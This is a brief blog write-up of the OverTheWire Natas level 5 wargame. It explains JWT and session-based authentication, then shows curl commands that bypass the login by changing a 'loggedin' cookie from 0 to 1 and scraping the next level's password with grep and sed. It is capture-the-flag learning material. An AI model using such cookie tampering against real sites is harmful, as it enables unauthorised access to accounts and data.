Over the wire - Natas5
Natas5
The hint indicated that it was about authentication. It said that I wasn’t logged in. Two things instatnly come to mind when I hear the word authentication.
- JWT - Json Web token - stateless way of authentication. The Server/Client flow goes like this:
- Client logs in with credentials
- Server verifies credentials against the DB
- Server generates a JWT using header + payload + signature (signed with secret key). JWT is a base64 encoded string, so anyone can decode it, but it is signed so no one can tamper with it.
- Server sends the token to the client (cookie or response body)
- Client stores the token and sends it with every future request
- Server verifies the signature and if valid, reads the payload directly — no DB lookup needed — and processes the request
- Sessions - Stateful way of authentication. It means that the server has to keep the user information usually in a database. The Server/Client flow goes like this:
- Client logs in with credentials
- Server verifies credentials
- Server generates a session ID
- Server stores session_id → user_id in a database
- Server sends session ID in a cookie to the client
- Client sends future requests with the session ID cookie
- Server looks up the session ID → finds the user → processes the request
- Server responds with the requested resource/data
What kind of authentication this challengs is using? I used curl to fetch the cookies and noticed there’s a loggedin cookie with a value of 0. I changed the value to 1 and attached the cookie to the request, and the rest is history. Used grep / sed to extract the password. On to the next one!
URL=http://natas5.natas.labs.overthewire.org
curl --user natas5:$(cat natas5 ) $URL -c cookie-jar
cat cookie-jar
# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
natas5.natas.labs.overthewire.org FALSE / FALSE 0 loggedin 0
curl --user natas5:$(cat natas5 ) $URL -b cookie-jar
curl --user natas5:$(cat natas5 ) $URL -b cookie-jar |
grep "natas6" | sed "s/.*is //" | sed "s/<.*//" > natas6
Over the wire Natas Curl Linux Web Security Authentication JWT Sessions
343 Words
2026-03-04 21:37 (Last updated: 2026-03-04 21:37)